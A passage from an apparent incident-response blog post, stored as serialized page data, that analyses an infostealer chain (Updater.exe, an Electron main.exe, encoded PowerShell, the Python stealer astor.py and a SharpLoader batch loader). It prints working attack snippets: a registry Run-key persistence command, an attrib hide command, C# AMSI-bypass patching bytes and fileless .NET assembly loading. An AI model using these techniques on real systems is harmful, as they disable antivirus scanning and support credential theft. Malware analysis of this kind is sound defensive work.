Its sole purpose was to serve as a wrapper for launching a PowerShell session with an ",[1736,7203,7204],{},"encoded command",[806,7206,7207],{},"This method is a well-known tactic used to reduce visibility and avoid detection:",[2738,7209,7210,7221],{},[2741,7211,7212,3034,7215],{},[1736,7213,7214],{},"Execution Chain",[1545,7216,7219],{"className":7217,"code":7218,"language":916},[1548],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[1524,7220,7218],{"__ignoreMap":863},[2741,7222,7223,3034,7226],{},[1736,7224,7225],{},"Purpose",[2738,7227,7228,7231,7234],{},[2741,7229,7230],{},"Encapsulates PowerShell execution within an additional shell",[2741,7232,7233],{},"Hides the actual PowerShell code from direct visibility in logs",[2741,7235,7236,7237,7240],{},"Evades EDRs that trigger on direct ",[1524,7238,7239],{},"powershell.exe"," usage with suspicious parameters",[806,7242,7243,7244,7246],{},"By embedding the PowerShell script as a Base64-encoded string and invoking it through ",[1524,7245,7144],{},", the attacker avoided multiple forms of detection:",[2738,7248,7249,7254,7259],{},[2741,7250,7251],{},[1736,7252,7253],{},"Command-line heuristic filters",[2741,7255,7256],{},[1736,7257,7258],{},"Standard logging (e.g., Event ID 4104, 4688)",[2741,7260,7261],{},[1736,7262,7263,7264,7266,7267,2289,7270,7273],{},"Rule-based detections for ",[1524,7265,7239],{}," arguments like ",[1524,7268,7269],{},"-NoProfile",[1524,7271,7272],{},"-ExecutionPolicy Bypass",", or inline scripts",[806,7275,7276,7277,7279,7280,7282],{},"Notably, the PowerShell command was kept minimal and solely focused on launching ",[1524,7278,6615],{}," with a path to the embedded stealer script — ",[1524,7281,6643],{},". 
No additional modules were loaded, and no obvious signatures were present in memory.",[806,7284,7285],{},"This relay technique is often used in red teaming and by sophisticated infostealers alike — serving as a lightweight evasion layer that’s easy to implement but hard to catch without telemetry correlation.",[806,7287,7051,7288,7290],{},[1524,7289,7144],{}," served exactly that purpose: a simple, silent bridge between JavaScript logic and Python execution — one that almost slipped through unnoticed.",[1671,7292,7294,7295,7297,7298],{"id":7293},"_215-pythonexe-with-astorpy","2.1.5 ",[1524,7296,6615],{}," with ",[1524,7299,6643],{},[806,7301,1677],{},[806,7303,7304,7305,7307,7308,7310],{},"The final and most impactful stage of the execution chain was reached when ",[1524,7306,6615],{}," invoked ",[1524,7309,6643],{}," — a Python-based, modular infostealer operating entirely in memory. This script represented the operational core of the entire attack chain.",[806,7312,7313,7314,7316],{},"Unlike many commodity stealers, ",[1524,7315,6643],{}," was not deployed in plaintext. 
It was protected by a multi-layered decryption mechanism:",[2738,7318,7319,7328],{},[2741,7320,7321,7324,7325,2786],{},[1736,7322,7323],{},"Decryption Stack",": The file was first GZIP-compressed and then encrypted using ",[1736,7326,7327],{},"AES-256-CBC",[2741,7329,7330,7333],{},[1736,7331,7332],{},"Key Derivation",": A PBKDF2-based key derivation process was used (SHA-512, 1,000,000 iterations), making static analysis and brute-forcing highly impractical.",[806,7335,7336],{},"Once decrypted at runtime, the script executed several specialized modules, all targeting sensitive data sources:",[806,7338,7339],{},[1736,7340,7341],{},"Core Capabilities",[2738,7343,7344,7350,7360,7370],{},[2741,7345,7346,7349],{},[1736,7347,7348],{},"Browser Data Extraction",": Retrieved login credentials, cookies, and autofill data from Chromium-based browsers (Chrome, Edge, Brave, Opera)",[2741,7351,7352,7355,7356,7359],{},[1736,7353,7354],{},"Token Harvesting",": Collected session tokens, particularly from ",[1736,7357,7358],{},"Discord",", and scanned for cryptocurrency wallet extensions",[2741,7361,7362,7365,7366,7369],{},[1736,7363,7364],{},"Data Packaging",": Aggregated all harvested data into a structured ",[1736,7367,7368],{},"ZIP archive",", preserving directory and file context for attacker-side parsing",[2741,7371,7372,7375],{},[1736,7373,7374],{},"Exfiltration",": Uploaded the resulting archive to public APIs and infrastructure.",[806,7377,7378],{},[1736,7379,7009],{},[806,7381,7382],{},"The entire stealer logic executed from memory, with no persistent files written to disk. It left minimal telemetry traces beyond in-process memory artifacts and standard subprocess invocation. 
No attempt was made to establish persistence at this stage — the goal was quick, efficient, and silent data theft.",[806,7384,7385],{},"The use of legitimate APIs for exfiltration also made detection and prevention significantly harder, as outbound traffic blended in with routine internet activity.",[806,7387,7388,7389,7391],{},"This stage ultimately confirmed the malware’s identity: a variant of ",[1736,7390,6704],{},", known for its:",[2738,7393,7394,7397,7400,7403],{},[2741,7395,7396],{},"High modularity",[2741,7398,7399],{},"Runtime obfuscation",[2741,7401,7402],{},"Commercial distribution via Telegram",[2741,7404,7405],{},"Strong focus on credential harvesting and token-based session hijacking",[806,7407,7408,7409,7411],{},"Together with the earlier stages, ",[1524,7410,6643],{}," formed the critical endpoint of a stealthy and well-engineered infostealer chain. In the following sections, we dissect this component further and explain how we reversed its logic, mapped its infrastructure, and recovered every indicator of compromise used during its operation.",[1511,7413,7415,7416],{"id":7414},"_3-deep-dive-updaterexe","3. Deep Dive: ",[1524,7417,6635],{},[806,7419,816],{},[806,7421,7422,7424],{},[1524,7423,6635],{}," was the initial binary observed during post-compromise analysis. 
Despite its neutral appearance and negligible detection footprint, it played a critical role in maintaining the malware's operational persistence and delivering the next-stage payload.",[810,7426,7428],{"id":7427},"_31-properties","3.1 Properties",[806,7430,1536],{},[1902,7432,7433,7443],{},[1907,7434,7435],{},[1911,7436,7437,7440],{},[1915,7438,7439],{},"Property",[1915,7441,7442],{},"Value",[1923,7444,7445,7455,7465,7475,7485,7495],{},[1911,7446,7447,7452],{},[1928,7448,7449],{},[1736,7450,7451],{},"Format:",[1928,7453,7454],{},"Windows Portable Executable (PE32)",[1911,7456,7457,7462],{},[1928,7458,7459],{},[1736,7460,7461],{},"Architecture:",[1928,7463,7464],{},"x86-64",[1911,7466,7467,7472],{},[1928,7468,7469],{},[1736,7470,7471],{},"Size:",[1928,7473,7474],{},"~154 KB",[1911,7476,7477,7482],{},[1928,7478,7479],{},[1736,7480,7481],{},"Entropy:",[1928,7483,7484],{},"Normal (non-packed)",[1911,7486,7487,7492],{},[1928,7488,7489],{},[1736,7490,7491],{},"Signatures:",[1928,7493,7494],{},"None",[1911,7496,7497,7502],{},[1928,7498,7499],{},[1736,7500,7501],{},"VirusTotal Detection:",[1928,7503,7504],{},"1/69 at time of analysis",[806,7506,7507],{},"The file exhibited a clean import table and no embedded string indicators. No known packers, crypters, or runtime obfuscation mechanisms were detected. The structure was consistent with custom-compiled binaries.",[810,7509,7511],{"id":7510},"_32-behavioral-analysis","3.2 Behavioral Analysis",[806,7513,1536],{},[806,7515,7516],{},[1736,7517,7518],{},"No User Interaction Required",[806,7520,7521,7522,7524],{},"The malware chain executed without any required user interaction. Based on Defender’s process telemetry, the initial binary (",[1524,7523,6635],{},") was launched automatically — most likely via a persistence mechanism such as a registry autorun key. 
However, due to the age of the compromise and the absence of historical event logs, the exact method of persistence could not be recovered.",[806,7526,7527],{},[1736,7528,7529],{},"Silent Execution and Staging",[806,7531,7532,7533,7535,7536,7538],{},"Upon execution, ",[1524,7534,6635],{}," immediately launched ",[1524,7537,6639],{}," with no visual window and no user prompts. The staging occurred silently in the background. There was no evidence of user consent dialogs, UAC prompts, or GUI components.",[806,7540,7541],{},[1736,7542,7543],{},"Payload Deployment Behavior",[806,7545,7546,7548],{},[1524,7547,6639],{}," was found to be part of an Electron application structure, but the exact origin of its deployment remains unclear. One of the following is assumed:",[2738,7550,7551,7557],{},[2741,7552,7553,7554,7556],{},"The payload may have been bundled internally within ",[1524,7555,6635],{}," (e.g., embedded resource), or",[2741,7558,7559],{},"It may have been retrieved from a remote source",[806,7561,7562],{},"Due to a lack of network telemetry and no recovered hardcoded URL, the delivery vector for the Electron app remains inconclusive.",[806,7564,7565],{},[1736,7566,7567],{},"Process Chain Behavior",[806,7569,7570,7571,7573,7574,7576],{},"Once executed, ",[1524,7572,6635],{}," spawned ",[1524,7575,6639],{}," as a child process. The invocation was non-interactive, and no process spawned from the chain exhibited UI activity. The process chain continued as expected:",[1545,7578,7581],{"className":7579,"code":7580,"language":916},[1548],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[1524,7582,7580],{"__ignoreMap":863},[806,7584,7585],{},"All execution stages operated without requiring user input, relying solely on pre-configured launch logic and silent execution paths. 
This minimized exposure and helped the malware remain undetected over an extended period.",[810,7587,7589],{"id":7588},"_33-role-in-the-infection-chain","3.3 Role in the Infection Chain",[806,7591,1536],{},[806,7593,7594,7596,7597,7600,7601,2786],{},[1524,7595,6635],{}," played a ",[1736,7598,7599],{},"single but essential role"," within the broader infection chain: it was responsible for the persistence and redeployment of the stage-2 component — ",[1524,7602,6639],{},[806,7604,7605],{},[1736,7606,7607],{},"Confirmed Characteristics",[2738,7609,7610,7617,7622],{},[2741,7611,7612,7613,7616],{},"It ",[1736,7614,7615],{},"did not"," contain or execute malicious logic directly",[2741,7618,7612,7619,7621],{},[1736,7620,7615],{}," perform any data exfiltration",[2741,7623,7612,7624,7626],{},[1736,7625,7615],{}," interact with browser credential stores or sensitive user data",[806,7628,7629,7630,7632],{},"Its sole purpose was to silently launch ",[1524,7631,6639],{}," during user login, using a registry autorun entry as the most likely method of persistence (though not directly recovered due to telemetry limitations).",[806,7634,7635,7636,7638,7639,7641],{},"By acting as an isolated first-stage loader, ",[1524,7637,6635],{}," ensured that the actual stealer payload (",[1524,7640,6643],{},") remained concealed in deeper layers of execution. 
This separation of duties allowed the attackers to:",[2738,7643,7644,7647,7650],{},[2741,7645,7646],{},"Avoid correlation by static AV or sandbox systems",[2741,7648,7649],{},"Swap or update payloads without modifying the loader",[2741,7651,7652],{},"Reduce behavioral signals at the entry point",[806,7654,7655,7656,7659],{},"This pattern is typical in ",[1736,7657,7658],{},"malware-as-a-service (MaaS)"," operations, where delivery mechanisms are generic and payloads are modular or client-specific.",[806,7661,7051,7662,7664],{},[1524,7663,6635],{}," provided just enough logic to serve as a reliable and stealthy entry point — nothing more, but also nothing less.",[810,7666,7668],{"id":7667},"_34-persistence-via-registry-confirmed-in-astorpy","3.4 Persistence via Registry (Confirmed in astor.py)",[806,7670,1536],{},[806,7672,7673,7674,7676],{},"Static analysis of the Python payload revealed that ",[1524,7675,6635],{}," is explicitly persisted using a registry autorun entry:",[2738,7678,7679,7687,7695],{},[2741,7680,7681,2545,7684],{},[1736,7682,7683],{},"Registry Path",[1524,7685,7686],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[2741,7688,7689,2545,7692],{},[1736,7690,7691],{},"Value Name",[1524,7693,7694],{},"Realtek Audio",[2741,7696,7697,2545,7700],{},[1736,7698,7699],{},"Payload Path",[1524,7701,7702],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[806,7704,7705],{},"The corresponding registry command is executed via PowerShell:",[1545,7707,7711],{"className":7708,"code":7709,"language":7710,"meta":863,"style":863},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[1524,7712,7713],{"__ignoreMap":863},[1588,7714,7715],{"class":1590,"line":1591},[1588,7716,7709],{},[806,7718,7719],{},"This ensures the malware is launched at every user login. 
The file is also marked with hidden and system attributes to further evade detection:",[1545,7721,7723],{"className":7708,"code":7722,"language":7710,"meta":863,"style":863},"attrib +h +s \"Updater.exe\"\n",[1524,7724,7725],{"__ignoreMap":863},[1588,7726,7727],{"class":1590,"line":1591},[1588,7728,7722],{},[806,7730,7731],{},"This persistence mechanism was embedded directly into the astor.py code, confirming that the final-stage stealer actively maintains loader presence on disk and in the startup registry.",[810,7733,7735],{"id":7734},"_35-summary","3.5 Summary",[806,7737,1536],{},[3587,7739,7740],{},[806,7741,7742,7743,7745],{},"While ",[1524,7744,6635],{}," was not inherently malicious in structure or content, its contextual behavior within the execution chain confirmed its role as a malware loader.",[1541,7747],{"className":7748},[6875],[806,7750,7751],{},"This binary served as a clean, minimalistic first-stage launcher — avoiding detection by static analysis, AV engines, and behavioral rules. Its design focused purely on stealth and operational support, not on executing malicious logic itself.",[806,7753,7754,7755,7757,7758,7760,7761,7764],{},"However, its role extended beyond initial deployment. During reverse engineering of the ",[1524,7756,6643],{}," payload, we identified logic that actively checked for the presence of ",[1524,7759,6635],{},". This check was part of a broader ",[1736,7762,7763],{},"health and self-healing cycle"," implemented within the stealer code — a mechanism designed to verify the integrity of the infection chain and restore missing components if needed.",[806,7766,7767,7768,7770,7771,7774],{},"This means that ",[1524,7769,6635],{}," was not only responsible for initiating the malware, but also formed part of its ",[1736,7772,7773],{},"ongoing runtime validation",". 
Without this stub, the malware could lose its ability to reinitialize in future sessions.",[806,7776,7777],{},[1736,7778,7779,7780,3034],{},"Key Functions of ",[1524,7781,6635],{},[2738,7783,7784,7789,7794,7797],{},[2741,7785,7786,7787],{},"Seamless deployment of ",[1524,7788,6639],{},[2741,7790,7791,7792],{},"Indirect execution of ",[1524,7793,6643],{},[2741,7795,7796],{},"Decoupling of loader and payload logic",[2741,7798,7799,7802],{},[1736,7800,7801],{},"Referenced by the payload itself"," as part of operational health monitoring",[806,7804,7805],{},"In Section 5, we will detail the internal health-check routines of the stealer, including its self-healing behavior and integrity validation mechanisms.",[806,7807,7808,7809,7811],{},"For now, it is clear that ",[1524,7810,6635],{}," served as both ignition and anchor point in this layered infostealer architecture.",[810,7813,7815],{"id":7814},"_36-extraction-trick-outsmarting-the-loader","3.6 Extraction Trick: Outsmarting the Loader",[806,7817,1536],{},[806,7819,7820],{},"Sometimes, the best reverse engineering results don’t come from deep binary disassembly — but from a bit of trickery and patience.",[806,7822,7823,7824,7826,7827,7829],{},"While analyzing the infection in a controlled lab environment, we noticed something odd: ",[1524,7825,6635],{}," was present and executing, but ",[1524,7828,6639],{}," had vanished from the file system. That’s when we had an idea — what happens if we let the malware repair itself?",[806,7831,7832,7833,7838,7839,7841],{},"We deliberately ",[1736,7834,7835,7836],{},"deleted ",[1524,7837,6639],{}," from the infected environment while leaving ",[1524,7840,6635],{}," untouched. 
And sure enough, after the next user session login, the loader sprang into action — not with a tantrum, but with a quiet attempt to rebuild its second stage.",[806,7843,7844,7845,2289,7847,7849,7850,7853,7854,7857,7858,2289,7860,7863,7864,7866],{},"Here’s where it got interesting: Instead of directly recreating ",[1524,7846,6639],{},[1524,7848,6635],{}," first dropped a file named ",[1524,7851,7852],{},"app-64.7z"," — a standard ",[1736,7855,7856],{},"7-Zip archive",". This archive contained the full Electron application structure, including ",[1524,7859,6639],{},[1524,7861,7862],{},"resources",", and the ",[1524,7865,7089],{}," payload with all embedded logic.",[806,7868,7869,7870,2786],{},"We had effectively ",[1736,7871,7872],{},"forced the malware to hand us the source package",[806,7874,7875],{},[1449,7876],{"alt":7877,"src":7878},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[806,7880,7881],{},"With this 7z archive in hand, we were able to extract, decompress, and fully reverse the JavaScript-based orchestration logic without even touching the original loader again. The archive structure matched the expected Electron app layout perfectly.",[806,7883,7884,7885,7888],{},"This behavior strongly suggests that the attackers deliberately chose a ",[1736,7886,7887],{},"modular and maintainable architecture",", using archives as flexible payload containers. It also allowed them to swap or update payload components without recompiling the loader binary.",[806,7890,7891],{},"And in our case? 
It allowed us to outsmart their chain, intercept the drop, and walk away with the full package — like stealing the blueprints off the workbench while the builder wasn’t looking.",[806,7893,7894,7895],{},"Let’s just say: ",[1736,7896,7897,7898,2289,7901,7904],{},"sometimes the best forensic tools are ",[1524,7899,7900],{},"del",[1524,7902,7903],{},"wait",", and a little curiosity.",[1511,7906,7908,7909],{"id":7907},"_4-deep-dive-powbat","4. Deep Dive: ",[1524,7910,7911],{},"pow.bat",[806,7913,816],{},[806,7915,7916,7917,7920],{},"In the analyzed malware campaign, the component ",[1524,7918,7919],{},"Invoke-SharpLoader"," acts as a custom, memory-resident .NET loader that exhibits a highly modular and evasive execution flow. This section dissects its internal architecture, its anti-analysis strategy via AMSI patching, and its role in facilitating the second stage payload.",[810,7922,7924],{"id":7923},"_41-binary-properties-sharploader-batch-wrapper","4.1 Binary Properties – SharpLoader Batch Wrapper",[806,7926,1536],{},[806,7928,7929,7930,7932],{},"Before being executed to load the .NET payload in memory, the outer wrapper ",[1524,7931,7911],{}," shows the following characteristics based on static analysis:",[1902,7934,7935,7943],{},[1907,7936,7937],{},[1911,7938,7939,7941],{},[1915,7940,7439],{},[1915,7942,7442],{},[1923,7944,7945,7954,7963,7973,7982,7992,8002,8011],{},[1911,7946,7947,7951],{},[1928,7948,7949],{},[1736,7950,7451],{},[1928,7952,7953],{},"DOS Batch File",[1911,7955,7956,7960],{},[1928,7957,7958],{},[1736,7959,7461],{},[1928,7961,7962],{},"Script-based (not compiled binary)",[1911,7964,7965,7970],{},[1928,7966,7967],{},[1736,7968,7969],{},"File Size:",[1928,7971,7972],{},"27.79 KB (28454 bytes)",[1911,7974,7975,7979],{},[1928,7976,7977],{},[1736,7978,7481],{},[1928,7980,7981],{},"Normal (plain ASCII text)",[1911,7983,7984,7989],{},[1928,7985,7986],{},[1736,7987,7988],{},"Magic:",[1928,7990,7991],{},"DOS batch file, ASCII 
text",[1911,7993,7994,7999],{},[1928,7995,7996],{},[1736,7997,7998],{},"Digital Signature:",[1928,8000,8001],{},"None detected",[1911,8003,8004,8008],{},[1928,8005,8006],{},[1736,8007,7501],{},[1928,8009,8010],{},"26 / 61 (at time of analysis)",[1911,8012,8013,8018],{},[1928,8014,8015],{},[1736,8016,8017],{},"Threat Labels:",[1928,8019,8020,2289,8023,2289,8026,2289,8028],{},[1524,8021,8022],{},"trojan",[1524,8024,8025],{},"downloader",[1524,8027,7710],{},[1524,8029,8030],{},"agentb",[806,8032,8033,8034,8037],{},"Despite being a simple ",[1524,8035,8036],{},".bat"," file, the script evades many static detections and relies heavily on living-off-the-land techniques such as PowerShell to download and execute obfuscated and encrypted payloads.",[810,8039,8041,8042,2772],{"id":8040},"_42-amsi-bypass-technique-class-gofor4msi","4.2 AMSI Bypass Technique (Class: ",[1524,8043,8044],{},"gofor4msi",[806,8046,1536],{},[806,8048,8049],{},"One of the first defensive mechanisms bypassed by SharpLoader is AMSI — the Anti-Malware Scan Interface — a Microsoft feature integrated into scripting engines like PowerShell and Windows Script Host to provide real-time content scanning for suspicious behavior. Malware authors often attempt to bypass AMSI to avoid detection by endpoint protection systems.",[806,8051,8052,8053,8056,8057,8060,8061,8064,8065,8068,8069,8072],{},"In SharpLoader, the AMSI bypass is implemented through ",[1736,8054,8055],{},"direct in-memory patching"," of the ",[1524,8058,8059],{},"AmsiScanBuffer"," function within the ",[1524,8062,8063],{},"amsi.dll",". 
This function is normally responsible for analyzing script content and returning a result code indicating whether the content is suspicious (",[1524,8066,8067],{},"AMSI_RESULT_DETECTED",") or safe (",[1524,8070,8071],{},"AMSI_RESULT_CLEAN",").",[806,8074,8075],{},"The relevant in-memory patching code is:",[1545,8077,8081],{"className":8078,"code":8079,"language":8080,"meta":863,"style":863},"language-csharp shiki shiki-themes github-light github-dark","var lib = Win32.LoadLibrary(\"amsi.dll\");\nvar addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\nWin32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\nMarshal.Copy(patch, 0, addr, patch.Length);\n","csharp",[1524,8082,8083,8088,8093,8098],{"__ignoreMap":863},[1588,8084,8085],{"class":1590,"line":1591},[1588,8086,8087],{},"var lib = Win32.LoadLibrary(\"amsi.dll\");\n",[1588,8089,8090],{"class":1590,"line":864},[1588,8091,8092],{},"var addr = Win32.GetProcAddress(lib, \"AmsiScanBuffer\");\n",[1588,8094,8095],{"class":1590,"line":1814},[1588,8096,8097],{},"Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);\n",[1588,8099,8100],{"class":1590,"line":1831},[1588,8101,8102],{},"Marshal.Copy(patch, 0, addr, patch.Length);\n",[806,8104,8105],{},"This sequence performs the following steps:",[4351,8107,8108,8117,8128,8138],{},[2741,8109,8110,8113,8114,2786],{},[1736,8111,8112],{},"Load the AMSI DLL"," into the process using ",[1524,8115,8116],{},"LoadLibrary(\"amsi.dll\")",[2741,8118,8119,8122,8123,6644,8125,2786],{},[1736,8120,8121],{},"Resolve the memory address"," of the function ",[1524,8124,8059],{},[1524,8126,8127],{},"GetProcAddress()",[2741,8129,8130,8133,8134,8137],{},[1736,8131,8132],{},"Change the memory protection"," of the address using ",[1524,8135,8136],{},"VirtualProtect()"," to make it writable.",[2741,8139,8140,8143,8144,8147],{},[1736,8141,8142],{},"Overwrite the beginning of the function"," using ",[1524,8145,8146],{},"Marshal.Copy()"," with a small shellcode 
patch.",[806,8149,8150],{},"The patch applied for 64-bit systems is:",[1545,8152,8154],{"className":8078,"code":8153,"language":8080,"meta":863,"style":863},"static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret\n",[1524,8155,8156],{"__ignoreMap":863},[1588,8157,8158],{"class":1590,"line":1591},[1588,8159,8153],{},[806,8161,8162],{},"This corresponds to the following instructions:",[2738,8164,8165,8174],{},[2741,8166,8167,8170,8171],{},[1524,8168,8169],{},"mov eax, 0x80070057"," → sets the return code to the Windows error code ",[1524,8172,8173],{},"E_INVALIDARG",[2741,8175,8176,8179],{},[1524,8177,8178],{},"ret"," → immediately returns from the function",[806,8181,8182,8183,8185],{},"This effectively causes ",[1524,8184,8059],{}," to fail silently and return a non-detection result, neutralizing AMSI checks. The malware can now execute scripts or .NET code that would otherwise trigger antivirus alerts.",[806,8187,8188],{},"If executed on a 32-bit system, a different patch is applied:",[1545,8190,8192],{"className":8078,"code":8191,"language":8080,"meta":863,"style":863},"static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; // mov eax, ...; ret 0x18\n",[1524,8193,8194],{"__ignoreMap":863},[1588,8195,8196],{"class":1590,"line":1591},[1588,8197,8191],{},[806,8199,8200],{},"This reflects the same goal — forcing a \"clean\" result — but adapted to the x86 calling convention.",[806,8202,8203,8204,2289,8207,8210,8211,8214],{},"Using raw P/Invoke calls like ",[1524,8205,8206],{},"LoadLibrary",[1524,8208,8209],{},"GetProcAddress",", and ",[1524,8212,8213],{},"VirtualProtect"," allows this patching to be done dynamically and without invoking any high-level APIs that might be monitored by EDR tools. 
This method is compact, effective, and leaves minimal forensic artifacts.",[806,8216,8217,8218,8221],{},"In summary, this AMSI bypass technique is a ",[1736,8219,8220],{},"low-level, direct memory attack on the antivirus interface",", carried out in milliseconds during runtime. It's a powerful example of why behavioral monitoring and memory inspection are essential in modern endpoint defense systems.",[810,8223,8225],{"id":8224},"_43-stage-2-payload-handling","4.3 Stage 2 Payload Handling",[806,8227,1536],{},[806,8229,8230,8231,8234],{},"After the AMSI bypass is complete, the loader proceeds to retrieve and prepare the second-stage payload. This payload is not embedded in the loader itself but is fetched either from a remote server or read from disk — depending on how the loader is invoked via the ",[1524,8232,8233],{},"$location"," parameter.",[806,8236,8237,8238,8241,8242,8245,8246,8249,8250,8253,8254,8257],{},"If the location begins with ",[1524,8239,8240],{},"http",", it is interpreted as a URL and the loader uses ",[1524,8243,8244],{},"Get_Stage2()"," to download the payload via ",[1524,8247,8248],{},"HttpWebRequest",". If it is a local path, ",[1524,8251,8252],{},"Get_Stage2disk()"," reads the contents directly from the file system. In both cases, the expected file content is a ",[1736,8255,8256],{},"Base64-encoded, GZip-compressed, and AES-encrypted"," blob.",[806,8259,8260,8261,8264],{},"The loader then performs a ",[1736,8262,8263],{},"four-stage decoding and decryption pipeline"," entirely in memory:",[4351,8266,8267,8273,8283,8293],{},[2741,8268,8269,8272],{},[1736,8270,8271],{},"Base64 Decoding",": Converts the encoded string into raw bytes. 
This step is designed to obscure the actual binary content from static inspection tools and prevents straightforward pattern matching.",[2741,8274,8275,8278,8279,8282],{},[1736,8276,8277],{},"GZip Decompression",": The decoded bytes are passed to a ",[1524,8280,8281],{},"GZipStream",", which decompresses the payload. Compression reduces file size and adds another layer of obfuscation.",[2741,8284,8285,8288,8289,8292],{},[1736,8286,8287],{},"AES Decryption",": The compressed bytes are decrypted using AES (Rijndael) in CBC mode. The key is derived at runtime from the user-provided password using SHA-256 hashing combined with PBKDF2 (",[1524,8290,8291],{},"Rfc2898DeriveBytes",") and a static salt.",[2741,8294,8295,8298],{},[1736,8296,8297],{},"Salt Removal",": The decrypted result still contains a fixed-length salt prefix (4 bytes). These bytes are removed manually to obtain the clean binary blob that represents a valid .NET assembly.",[806,8300,8301],{},"The decryption pipeline is executed like so:",[1545,8303,8305],{"className":8078,"code":8304,"language":8080,"meta":863,"style":863},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\nbyte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[1524,8306,8307,8312],{"__ignoreMap":863},[1588,8308,8309],{"class":1590,"line":1591},[1588,8310,8311],{},"byte[] passwordBytes = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password));\n",[1588,8313,8314],{"class":1590,"line":864},[1588,8315,8316],{},"byte[] bytesDecrypted = AES_Decrypt(decompressed, passwordBytes);\n",[806,8318,8319,8320,8323],{},"Here, ",[1524,8321,8322],{},"AES_Decrypt()"," is a custom function that wraps the Rijndael algorithm, configured with a 256-bit key and a 128-bit IV (initialization vector), both derived from the password.",[806,8325,8326],{},[1736,8327,8328],{},"Key Design Observations:",[2738,8330,8331,8334,8337],{},[2741,8332,8333],{},"The use of AES-CBC with PBKDF2 makes brute-forcing the 
password non-trivial.",[2741,8335,8336],{},"Since decryption happens in memory, no intermediate results are ever written to disk — reducing forensic artifacts.",[2741,8338,8339],{},"If the wrong password is supplied, decryption silently fails or produces invalid data, which may lead to failed execution or hard-to-trace exceptions.",[806,8341,8342],{},"In summary, this multi-stage payload handling approach significantly raises the bar for both signature- and heuristic-based static detection. Without either live execution or deep inspection of the loader behavior, defenders are unlikely to uncover the embedded payload without also knowing the password and exact decoding logic.",[810,8344,8346],{"id":8345},"_44-dynamic-assembly-loading","4.4 Dynamic Assembly Loading",[806,8348,1536],{},[806,8350,8351],{},"Once the second-stage payload has been successfully decrypted, the resulting byte array represents a valid .NET assembly. Instead of writing this assembly to disk — a common indicator for antivirus or EDR systems — SharpLoader executes it directly in memory using reflection:",[1545,8353,8355],{"className":8078,"code":8354,"language":8080,"meta":863,"style":863},"Assembly a = Assembly.Load(bin);\na.EntryPoint.Invoke(null, new object[] { commands });\n",[1524,8356,8357,8362],{"__ignoreMap":863},[1588,8358,8359],{"class":1590,"line":1591},[1588,8360,8361],{},"Assembly a = Assembly.Load(bin);\n",[1588,8363,8364],{"class":1590,"line":864},[1588,8365,8366],{},"a.EntryPoint.Invoke(null, new object[] { commands });\n",[806,8368,8369,8370,8373],{},"This technique is referred to as ",[1736,8371,8372],{},"fileless execution",". 
It is highly evasive because it:",[2738,8375,8376,8379,8382],{},[2741,8377,8378],{},"Avoids touching the disk, leaving no file-based IOCs (indicators of compromise)",[2741,8380,8381],{},"Makes traditional forensic acquisition harder, as no binary is saved on disk",[2741,8383,8384],{},"Evades static signature-based detection, since AV engines often rely on scanning files",[806,8386,8387,8388,8391,8392,8395],{},"If the ",[1524,8389,8390],{},"EntryPoint"," is not ",[1524,8393,8394],{},"static",", the loader includes a fallback logic:",[1545,8397,8399],{"className":8078,"code":8398,"language":8080,"meta":863,"style":863},"MethodInfo method = a.EntryPoint;\nif (method != null)\n{\n    object o = a.CreateInstance(method.Name);\n    method.Invoke(o, null);\n}\n",[1524,8400,8401,8406,8411,8416,8421,8426],{"__ignoreMap":863},[1588,8402,8403],{"class":1590,"line":1591},[1588,8404,8405],{},"MethodInfo method = a.EntryPoint;\n",[1588,8407,8408],{"class":1590,"line":864},[1588,8409,8410],{},"if (method != null)\n",[1588,8412,8413],{"class":1590,"line":1814},[1588,8414,8415],{},"{\n",[1588,8417,8418],{"class":1590,"line":1831},[1588,8419,8420],{},"    object o = a.CreateInstance(method.Name);\n",[1588,8422,8423],{"class":1590,"line":2135},[1588,8424,8425],{},"    method.Invoke(o, null);\n",[1588,8427,8428],{"class":1590,"line":2141},[1588,8429,8430],{},"}\n",[806,8432,8433,8434,8437],{},"This ensures compatibility with assemblies that require an instantiated object for execution (e.g., ",[1524,8435,8436],{},"public int Main()"," inside a class instance). 
The code dynamically creates an instance of the class and then calls the entry point method.",[806,8439,8440],{},"Combined with the AMSI bypass and in-memory decryption, this mechanism delivers the final payload to execution in a stealthy, fully fileless manner — a hallmark of modern, evasive malware.",[810,8442,8444],{"id":8443},"_45-command-line-parameters-and-flexibility","4.5 Command Line Parameters and Flexibility",[806,8446,1536],{},[806,8448,8449,8450,8452],{},"The PowerShell function ",[1524,8451,7919],{}," is designed to act as a flexible wrapper for arbitrary .NET payloads. It supports dynamic input of both the payload location and arguments, allowing a single loader instance to be reused across multiple operations or campaigns.",[806,8454,8455],{},[1736,8456,8457],{},"Supported Parameters:",[2738,8459,8460,8466,8472,8492],{},[2741,8461,8462,8465],{},[1524,8463,8464],{},"-location"," (mandatory): Specifies either a URL or a local file path to the stage two encrypted payload.",[2741,8467,8468,8471],{},[1524,8469,8470],{},"-password"," (mandatory): Used to derive the AES decryption key.",[2741,8473,8474,2289,8477,2289,8480,8483,8484,8487,8488,8491],{},[1524,8475,8476],{},"-argument",[1524,8478,8479],{},"-argument2",[1524,8481,8482],{},"-argument3"," (optional): These are forwarded directly to the ",[1524,8485,8486],{},".NET"," assembly’s ",[1524,8489,8490],{},"Main()"," method via reflection.",[2741,8493,8494,8497],{},[1524,8495,8496],{},"-noArgs",": Triggers execution without passing any 